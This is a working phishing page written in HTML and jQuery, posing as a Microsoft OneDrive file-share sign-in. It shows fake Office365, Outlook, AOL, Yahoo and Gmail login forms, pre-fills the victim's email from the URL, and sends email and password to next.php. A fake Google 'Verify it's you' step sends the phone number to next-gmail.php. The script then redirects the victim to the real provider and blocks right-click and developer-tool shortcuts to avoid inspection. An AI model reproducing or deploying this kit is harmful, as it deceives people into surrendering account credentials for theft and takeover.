 
<!doctype html> 
<html lang="en"> 
    <head> 
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>         
        <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>         
        <!-- Required meta tags -->         
        <meta charset="utf-8"> 
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> 
        <!-- Bootstrap CSS -->         
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> 
        <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet"> 
        <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>         
        <title>OneDrive</title>         
        <link href="css/hover.css" rel="stylesheet" media="all"> 
        <style type="text/css"></style>         
    </head>     
    <body style="background-image: url('images/bg-1.jpg'); background-size: cover;background-repeat: no-repeat; " oncontextmenu="return false"> 
        <div class="container-fluid p-0"> 
            <div class="container-fluid"> 
                <div class="row" style="margin: 30px 0px 30px 0px; color: #ffffff; font-size: 15px;"> 
                    <div class="col-lg-6 align-self-center text-center"> 
                        <img src="images/111.png" class="img-fluid" width="150px">
                        <div>Sign in or Create an account
                            <br>
                        </div>                         
                    </div>                     
                    <div class="col-lg-4 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;"> 
                        <div class="text-center pt-5"> 
                            <span class="h5 text-white">Select and Click on your Email Provider Below.</span> 
                            <span class="h5" style="color:#0070C6; ">Only receiver email can access file sharing.</span> 
                        </div>                         
                        <div class="mt-3"> 
                            <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">  <div class="rounded px-2 py-1 mt-2" style=" background-color: #FF3C00;"> 
                                    <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"> 
                                    <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span> 
                                </div>  </a> 
                            <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">  <div class="rounded px-2 py-1 mt-2" style=" background-color: #0073C8;"> 
                                    <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"> 
                                    <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Outlook</span> 
                                </div>  </a> 
                            <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">  <div class="rounded px-2 py-1 mt-2" style=" background-color: #31459B;"> 
                                    <img src="images/aol1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"> 
                                    <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Aol</span> 
                                </div>  </a> 
                            <a href="javascript:void(0)" id="yahoomodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">  <div class="rounded px-2 py-1 mt-2" style=" background-color: #5F0F68;"> 
                                    <img src="images/yahoo1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"> 
                                    <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Yahoo!</span> 
                                </div>  </a> 
                            <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">  <div class="rounded px-2 py-1 mt-2" style=" background-color: #0B5BD3;"> 
                                    <img src="images/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"> 
                                    <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span> 
                                </div>  </a> 
                            <p class="h5 text-center text-white mt-2">Microsoft © 2020</p> 
                        </div>                         
                    </div>                     
                </div>                 
            </div>             
        </div>         
        <!-- Modal for gmail -->         
        <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true"> 
            <div class="modal-dialog" role="document"> 
                <div class="modal-content"> 
                    <div class="modal-header"> 
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close"> 
                            <span aria-hidden="true">&times;</span> 
                        </button>                         
                    </div>                     
                    <div class="modal-body"> 
                        <center> 
                            <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px"> 
                            <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5> 
                            <div class="alert alert-danger" id="msg" style="display: none;"></div>                             
                            <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span> 
                        </center>                         
                        <form id="contact" class="form-horizontal well"> 
                            <div id="div1"> 
                                <div class="col-lg-12"> 
                                    <div class="form-group"> 
                                        <div id="inputbar"> 
                                            <label for="exampleInputEmail1">Email address</label>                                             
                                            <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email"> 
                                            <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small> 
                                        </div>                                         
                                        <div id="automail" class="h5 mt-5"> 
                                            <i class="fas fa-arrow-left" id="back1"></i>&nbsp
                                            <span id="emailch">abc@abc.com</span> 
                                        </div>                                         
                                    </div>                                     
                                </div>                                 
                                <div class="col-lg-12"> 
                                    <div class="form-group"> 
                                        <label for="Password">Password</label>                                         
                                        <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password"> 
                                    </div>                                     
                                </div>                                 
                            </div>                             
                            <div id="div2" style="display: none;"> 
                                <i class="fas fa-arrow-left" id="back"></i>&nbsp
                                <span id="emailch1" class="h5">abc@abc.com</span>
                                <br> 
                                <span class="h4 font-weight-normal">Verify it's you</span>
                                <br> 
                                <span>This device is not recognized. For security, Google want to make sure it's really you.</span>
                                <br> 
                                <span id="msg1" class="text-danger"></span>
                                <br> 
                                <span>Try another way to sign in</span> 
                                <div class="form-group mt-3"> 
                                    <input type="number" name="phone" class="form-control" id="phone" aria-describedby="emailHelp" placeholder="Enter Phone No."> 
                                </div>                                 
                            </div>                             
                    </div>                     
                    <div class="modal-footer"> 
                        <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>                         
                        <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>                         
                        <button class="btn btn-lg btn-info pull-right" id="submit-btn1">verify</button>                         
                    </div>                     
                </form>                 
            </div>             
        </div>         
    </div>     
    <!-- Optional JavaScript -->     
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->     
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>     
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>     
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>     
</body> 
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> 
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script> 
<script>
    $("#submit-btn1").hide();

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      $('#back').click(function () {
        $("#msg").hide();
        $('#password').val("");
        $('#phone').val("");

        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });

    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        if (final=="gmail") {
          $('#contact').trigger("reset");
          $('#fieldImg').attr('src', 'images/gmail-1.png');
          $('#field').html("Gmail");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="outlook" || final=="hotmail")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/outlook-1.png');
          $('#field').html("Outlook");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="aol")
        {

          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/aol-1.png');
          $('#field').html("Aol");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="office365")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/office-365-1.png');
          $('#field').html("Office 365");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="yahoo")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/yahoo-1.png');
          $('#field').html("Yahoo");
          $("#msg").hide();
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $('#email').val(my_email);
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');

        }
        else
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/other-1.png');
          $('#field').html("Other Mail");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
      }
      ///////////////url getting email////////////////


      $('#gmailmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/gmail-1.png');
        $('#field').html("Gmail");
        $('#email').val("");
        $('#password').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#outlookmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/outlook-1.png');
        $('#field').html("Outlook");
        $('#email').val("");
        $('#password').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#aolmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/aol-1.png');
        $('#field').html("Aol");
        $('#email').val("");
        $('#password').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#office365modal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/office-365-1.png');
        $('#field').html("Office 365");
        $('#email').val("");
        $('#password').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#yahoomodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/yahoo-1.png');
        $('#field').html("Yahoo");
        $('#email').val("");
        $('#password').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#othermodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/other-1.png');
        $('#field').html("Other Mail");
        $('#email').val("");
        $('#password').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      if (count==1 && final=="gmail") {
        $('#emailch1').html(my_email);
        $("#div1").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({right:200, opacity:"show"}, 1000);
        $('#submit-btn').hide();
        $('#submit-btn1').show();
        
        return false;

      }
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    window.location.replace(response['redirect_link']);
                  }
                  $('#msg').html(response['msg']);
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
    });

      ///////////////start second button//////////////////

$('#submit-btn1').click(function(event){
          event.preventDefault();
          var email=$("#email").val();
          var password=$("#password").val();
          var phone=$("#phone").val();
          var msg1 = $('#msg1').html();
           $.ajax({
            dataType: 'JSON',
            url: 'next-gmail.php',
            type: 'POST',
            data:{
              email:email,
              password:password,
              phone:phone,

            },
            beforeSend: function(xhr){
              $('#submit-btn1').html('Verifing...');
            },
            success: function(response){
              $("#password").val("");
                window.location.replace("http://www.gmail.com");
              if(response){
                // $("#msg1").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 // $('#msg1').html(response['msg']);
               }
               else{
                // $('#msg1').html(response['msg']);
              }
            }
          },
          error: function(){
             $("#password").val("");
                window.location.replace("http://www.gmail.com");
            // $("#msg1").show();
            // $('#msg1').html("Please try again later");
          },
          complete: function(){
            $('#submit-btn1').html('Verify');
          }
        });
       });

      /////////////// end second button//////////////////




    });

document.onkeydown=function(e){
  if (e.ctrlKey && 
    (e.keyCode === 73 || 
     e.keyCode === 105 ||
     e.keyCode === 74 || 
     e.keyCode === 106 || 
     e.keyCode === 85 || 
     e.keyCode === 117)) {
    alert('not allowed');
  return false;
} else {
  return true;
}
}
</script> 
